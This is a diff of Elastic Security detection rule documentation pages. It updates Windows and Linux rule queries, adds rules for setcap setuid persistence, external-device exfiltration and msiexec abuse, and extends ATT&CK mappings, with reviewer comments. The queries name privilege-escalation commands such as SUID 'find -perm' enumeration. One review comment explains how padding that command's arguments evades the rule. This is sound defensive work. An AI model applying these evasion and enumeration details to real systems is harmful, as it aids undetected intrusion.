--- a/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc @@ -35,11 +35,12 @@ Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user rig * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Persistence * Data Source: Active Directory * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -104,7 +105,15 @@ event.action:"Authorization Policy Change" and event.code:4704 and ** Name: Credential Access ** ID: TA0006 ** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal or Forge Kerberos Tickets +** ID: T1558 +** Reference URL: https://attack.mitre.org/techniques/T1558/ * Tactic: ** Name: Persistence ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc index 46a1112672..8372f2b102 100644 --- a/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc @@ -31,11 +31,13 @@ Identifies Service Control (sc.exe) spawning from script interpreter processes t * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -121,3 +123,43 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc b/docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc new file mode 100644 index 0000000000..a13ecab3ab --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc 
@@ -0,0 +1,68 @@ +[[setcap-setuid-setgid-capability-set]] +=== Setcap setuid/setgid Capability Set + +This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "setcap" and process.args : "cap_set?id+ep" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc index b3f6170325..fca9a8882d 100644 --- a/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc @@ -33,7 +33,7 @@ This rule monitors the creation of shared object files by previously unknown pro * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -49,7 +49,8 @@ This rule monitors the creation of shared object files by previously unknown pro ---------------------------------- host.os.type:linux and event.action:(creation or file_create_event or file_rename_event or rename) and file.path:(/dev/shm/* or /usr/lib/*) and file.extension:so and -process.name: ( * and not ("5" or "dockerd" or "dpkg" or "rpm" or "snapd" or "exe" or "yum" or "vmis-launcher")) +process.name: ( * and not ("5" or "dockerd" or "dpkg" or "rpm" or "snapd" or "exe" or "yum" or "vmis-launcher" + or "pacman" or "apt-get" or "dnf")) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc index e68c0ae140..d874ef70f5 100644 --- a/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc 
@@ -32,10 +32,11 @@ Identifies a SolarWinds binary modifying the start type of a service to be disab * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Initial Access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -87,6 +88,10 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ * Tactic: ** Name: Initial Access ** ID: TA0001 diff --git a/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc b/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc index ba52b0b6ba..ade88a91ce 100644 --- a/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected a significant spike in the rate of a particular * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc new file mode 100644 index 0000000000..bee5e7f09f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc 
@@ -0,0 +1,58 @@ +[[spike-in-bytes-sent-to-an-external-device-via-airdrop]] +=== Spike in Bytes Sent to an External Device via Airdrop + +A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Other Network Medium +** ID: T1011 +** Reference URL: https://attack.mitre.org/techniques/T1011/ diff --git a/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc new file mode 100644 index 0000000000..92691dd128 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc 
@@ -0,0 +1,58 @@ +[[spike-in-bytes-sent-to-an-external-device]] +=== Spike in Bytes Sent to an External Device + +A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ diff --git a/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc index 543ce72006..9903c3d908 100644 --- a/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc 
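Review bot: spike-in-bytes-sent-to-an-external-device has the same empty Investigation guide block and the same duplicated `Rule Type: ML` / `Rule Type: Machine Learning` tags as its AirDrop sibling; the two pages otherwise differ only in the AirDrop qualifier and the technique mapping (T1052 here versus T1011 there), so one sentence in each description naming the device class and the ML job it covers would let analysts tell the two alerts apart.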
@@ -3,7 +3,7 @@ The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -32,7 +32,7 @@ The Secure Shell (SSH) authorized_keys file specifies which users are allowed to * Tactic: Persistence * Data Source: Elastic Defend -*Version*: 104 +*Version*: 204 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc index 67dca6e88e..b1ebe743fc 100644 --- a/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc @@ -27,10 +27,11 @@ Identifies files written or modified in the startup folder by unsigned processes * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -138,3 +139,15 @@ sequence by host.id, process.entity_id with maxspan=5s ** Name: Registry Run Keys / Startup Folder ** ID: T1547.001 ** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ 
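Review bot: the ssh-authorized-keys-file-modification hunk switches `*Rule type*` from query to new_terms and bumps the version to 204, but nothing on the rendered page says which fields are the new terms or what history window is used, and the query itself is absent from the hunk; compare suspicious-java-child-process later in this patch, where the same type change at least arrives with the query rewritten from EQL to KQL. The same gap applies to sudoers-file-modification and suspicious-modprobe-file-event.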
diff --git a/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc index d482c5ba44..37bb522102 100644 --- a/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the usage of the sudo -l command, which is used to list t * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc index f19fe95811..e6fa9a0153 100644 --- a/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc @@ -3,7 +3,7 @@ A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -31,7 +31,7 @@ A sudoers file specifies the commands that users or groups can run and from whic * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 103 +*Version*: 203 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc index ff1fecdf45..4364a6d0e3 100644 --- a/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc 
@@ -30,7 +30,7 @@ This rule monitors for the usage of the "find" command in conjunction with SUID * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -47,8 +47,10 @@ This rule monitors for the usage of the "find" command in conjunction with SUID process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "find" and process.args : "-perm" and process.args : ( "/6000", "-6000", "/4000", "-4000", "/2000", "-2000", "/u=s", "-u=s", "/g=s", "-g=s", "/u=s,g=s", "/g=s,u=s" -) and -not user.Ext.real.id == "0" and not group.Ext.real.id == "0" +) and not ( + user.Ext.real.id == "0" or group.Ext.real.id == "0" or process.args_count >= 12 or + (process.args : "/usr/bin/pkexec" and process.args : "-xdev" and process.args_count == 7) +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc index c5ee143c96..1c94d5f5a7 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc @@ -32,7 +32,7 @@ Detects when a user reports suspicious activity for their Okta account. These ev * Data Source: Okta * Tactic: Initial Access -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc index e6fbb324ef..03f74023bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc 
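Review bot: in the suid-sguid-enumeration-detected query the new `process.args_count >= 12` exclusion is trivially satisfiable: appending a few harmless predicates to `find / -perm -4000` (extra `-o -name` pairs, say) pushes the count past 12 and silences the rule, so it should be narrowed to the specific noisy invocations it was added for, or at least annotated the way the `/* noisy pattern */` comment does in the msiexec rule. The `/usr/bin/pkexec` / `-xdev` / `args_count == 7` exclusion reads like one particular scanner's command line; naming it would make later tuning safer. Rewriting `not A and not B` as `not (A or B)` for the two real-id checks is equivalent, so there is no behaviour change there.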
@@ -33,7 +33,7 @@ Identifies suspicious command execution (cmd) via Windows Management Instrumenta * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -71,3 +71,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Management Instrumentation ** ID: T1047 ** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc index 5af23728a0..0cf85f0b0d 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc @@ -27,10 +27,11 @@ Identifies suspicious child processes of communications apps, which can indicate * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: 
@@ -240,7 +241,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ * Technique: ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc index e9c1dfa948..e50c071977 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc @@ -33,7 +33,7 @@ Identifies when suspicious content is extracted from a file and subsequently dec * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc index c2aa3179c4..0a02219b79 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc 
@@ -32,7 +32,7 @@ Identifies when the openssl command-line utility is used to encrypt multiple fil * Tactic: Impact * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc index 81b463ff3e..7f737d5d89 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc @@ -38,11 +38,12 @@ Identifies the loading of a non Microsoft signed DLL that is missing on a defaul * Use Case: Threat Detection * Tactic: Persistence * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -153,3 +154,15 @@ any where host.os.type == "windows" and ** Name: DLL Search Order Hijacking ** ID: T1574.001 ** Reference URL: https://attack.mitre.org/techniques/T1574/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc index 96c88ddd22..6d63d9f3bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc @@ -33,7 +33,7 @@ A suspicious Endpoint Security parent process was detected. This may indicate a * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -76,3 +76,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc index 4933e48e60..8eb53fbcdc 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc @@ -32,9 +32,10 @@ Identifies when a script interpreter or signed binary is launched via a non-stan * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -98,3 +99,7 @@ process where host.os.type == "windows" and event.type == "start" and process.ex ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc new file mode 100644 index 0000000000..d8fadc0aa8 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc 
@@ -0,0 +1,94 @@ +[[suspicious-execution-via-msiexec]] +=== Suspicious Execution via MSIEXEC + +Identifies suspicious execution of the built-in Windows Installer, msiexec.exe, to install a package from usual paths or parent process. Adversaries may abuse msiexec.exe to launch malicious local MSI files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Msiexec/ +* https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + process.name : "msiexec.exe" and user.id : ("S-1-5-21*", "S-1-12-*") and process.parent.executable != null and + ( + (process.args : "/i" and process.args : ("/q", "/quiet") and process.args_count == 4 and + process.args : ("?:\\Users\\*", "?:\\ProgramData\\*") and + not process.parent.executable : ("?:\\Program Files (x86)\\*.exe", + "?:\\Program Files\\*.exe", + "?:\\Windows\\explorer.exe", + "?:\\Users\\*\\Desktop\\*", + "?:\\Users\\*\\Downloads\\*", + "?:\\programdata\\*")) or + + (process.args_count == 1 and not process.parent.executable : ("?:\\Windows\\explorer.exe", "?:\\Windows\\SysWOW64\\explorer.exe")) or + + (process.args : "/i" and process.args : ("/q", "/quiet") and process.args_count == 4 and + (process.parent.args : "Schedule" or process.parent.name : "wmiprvse.exe" or + process.parent.executable : 
"?:\\Users\\*\\AppData\\*" or + (process.parent.name : ("powershell.exe", "cmd.exe") and length(process.parent.command_line) >= 200))) or + + (process.args : "/i" and process.args : ("/q", "/quiet") and process.args_count == 4 and + process.working_directory : "?:\\" and process.parent.name : ("cmd.exe", "powershell.exe")) + ) and + + /* noisy pattern */ + not (process.parent.executable : "?:\\Users\\*\\AppData\\Local\\Temp\\*" and process.parent.args_count >= 2 and + process.args : "?:\\Users\\*\\AppData\\Local\\Temp\\*\\*.msi") and + + not process.args : ("?:\\Program Files (x86)\\*", "?:\\Program Files\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc index 4c7787314d..146fd0ff75 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc @@ -29,9 +29,10 @@ Identifies execution of a suspicious program via scheduled tasks by looking at p * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: 
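Review bot: the description of the new suspicious-execution-via-msiexec rule says "install a package from usual paths or parent process"; it should read "unusual paths or parent process", otherwise it states the opposite of what the query checks. In the query, the first branch excludes parent executables under `?:\\Users\\*\\Desktop\\*` and `?:\\Users\\*\\Downloads\\*`, yet a freshly downloaded dropper running `msiexec /i <file> /q` on an MSI under Users or ProgramData is exactly the delivery chain in the referenced Purple Fox write-up; if that exclusion exists for noise, say so in a comment like the `/* noisy pattern */` one further down. This query also keys on `event.action == "start"` while every other process query in this patch uses `event.type == "start"`; worth aligning or explaining.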
@@ -108,3 +109,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc index 8e729a39a8..444a1e5f92 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc @@ -30,10 +30,12 @@ Identifies a suspicious Windows explorer child process. Explorer.exe can be abus * 